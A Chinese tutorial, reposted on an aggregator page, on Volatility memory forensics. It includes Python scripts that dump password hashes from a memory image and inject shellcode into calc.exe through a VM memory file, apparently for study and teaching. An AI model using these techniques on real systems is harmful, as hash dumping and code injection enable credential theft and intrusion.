python自動攻擊指令碼

來源:互聯網
上載者:User

標籤:lsa   war   image   cal   系統   win32   注入   sda   pat   

自動化攻擊取證1.Volatility——進階記憶體取證架構工具

網路被攻破後,需要考證是否發生過攻擊事件,通常需要一個已感染主機的記憶體快照。可以利用volatility完成核心對象檢查、進程記憶體檢測和提取等任務,並提供取證分析能力。

volatility

1.1環境搭建與dump抓取

環境需要python2.7

  • windows python環境安裝 Anaconda
  • Windows下Anaconda2(Python2)和Anaconda3(Python3)的共存

    1.1.1 windows

    運行Volatility

    python vol.py -h

1.1.2 Linux(Kali)

用shell切換到Volatility目錄

1.1.3產生記憶體dump檔案

Volatility分析的是記憶體dump檔案,所以我們需要對疑似受到攻擊的系統抓取記憶體dump.主要有3種方法來抓取記憶體dump。

  • 利用cuckoo沙箱產生記憶體dump的特性
  • 利用VMware產生記憶體dump的特性
  • 使用第三方軟體抓取記憶體dump
1.1.41.1.5利用VMware

暫停虛擬機器系統,然後在對應目錄中找到*.vmem,例如:

1.1.6使用第三方軟體抓取

針對於物理機,通常可以使用如下工具來抓取記憶體dump:

KnTToolsF-ResponseMandiant MemoryzeHBGary FastDumpMoonSols Windows Memory ToolkitAccessData FTK ImagerEnCase/WinEnBelkasoft Live RAM CapturerATC-NY Windows Memory ReaderWinpmemWin32dd/Win64ddDumpIt
1.2 工具使用1.2.1 行為:抓取口令雜湊值
import sysimport structmemory_file       = "WinXPSP2.vmem"sys.path.append("/Downloads/volatility-2.3.1")import volatility.conf as confimport volatility.registry as registryregistry.PluginImporter()config = conf.ConfObject()import volatility.commands as commandsimport volatility.addrspace as addrspaceconfig.parse_options()config.PROFILE  = "WinXPSP2x86"config.LOCATION = "file://%s" % memory_fileregistry.register_global_options(config, commands.Command)registry.register_global_options(config, addrspace.BaseAddressSpace)from volatility.plugins.registry.registryapi import RegistryApifrom volatility.plugins.registry.lsadump import HashDumpregistry = RegistryApi(config)registry.populate_offsets()sam_offset = Nonesys_offset = Nonefor offset in registry.all_offsets:        if registry.all_offsets[offset].endswith("\\SAM"):        sam_offset = offset        print "[*] SAM: 0x%08x" % offset        if registry.all_offsets[offset].endswith("\\system"):        sys_offset = offset        print "[*] System: 0x%08x" % offset        if sam_offset is not None and sys_offset is not None:        config.sys_offset = sys_offset        config.sam_offset = sam_offset                hashdump = HashDump(config)                for hash in hashdump.calculate():            print hash                breakif sam_offset is None or sys_offset is None:    print "[*] Failed to find the system or SAM offsets."
1.2.2 行為:直接代碼注入
import sysimport structequals_button = 0x01005D51memory_file       = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"slack_space       = Nonetrampoline_offset = None# read in our shellcodesc_fd = open("cmeasure.bin","rb")sc    = sc_fd.read()sc_fd.close()sys.path.append("/Downloads/volatility-2.3.1")import volatility.conf as confimport volatility.registry as registryregistry.PluginImporter()config = conf.ConfObject()import volatility.commands as commandsimport volatility.addrspace as addrspaceregistry.register_global_options(config, commands.Command)registry.register_global_options(config, addrspace.BaseAddressSpace)config.parse_options()config.PROFILE  = "Win2003SP2x86"config.LOCATION = "file://%s" % memory_fileimport volatility.plugins.taskmods as taskmodsp = taskmods.PSList(config)for process in p.calculate():    if str(process.ImageFileName) == "calc.exe":                print "[*] Found calc.exe with PID %d" % process.UniqueProcessId        print "[*] Hunting for physical offsets...please wait."                address_space = process.get_process_address_space()        pages         = address_space.get_available_pages()                for page in pages:            physical = address_space.vtop(page[0])                        if physical is not None:                                    if slack_space is None:                                        fd = open(memory_file,"r+")                    fd.seek(physical)                    buf = fd.read(page[1])                                        try:                        offset = buf.index("\x00" * len(sc))                        slack_space  = page[0] + offset                                                print "[*] Found good shellcode location!"                        print "[*] Virtual address: 0x%08x" % slack_space                        print "[*] Physical address: 0x%08x" % (physical + offset)                        print "[*] Injecting shellcode."                                                fd.seek(physical + offset)                        fd.write(sc)                        fd.flush()                                                # create our trampoline                        tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)                        tramp += "\xff\xe3"                                                if trampoline_offset is not None:                            break                                            except:                        pass                                        fd.close()                                # check for our target code location                if page[0] <= equals_button and equals_button < ((page[0] + page[1])-7):                                        # calculate virtual offset                    v_offset = equals_button - page[0]                                        # now calculate physical offset                    trampoline_offset = physical + v_offset                                        print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)                                        if slack_space is not None:                        break                        print "[*] Writing trampoline..."                fd = open(memory_file, "r+")        fd.seek(trampoline_offset)        fd.write(tramp)        fd.close()                print "[*] Done injecting code."               

python自動攻擊指令碼

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.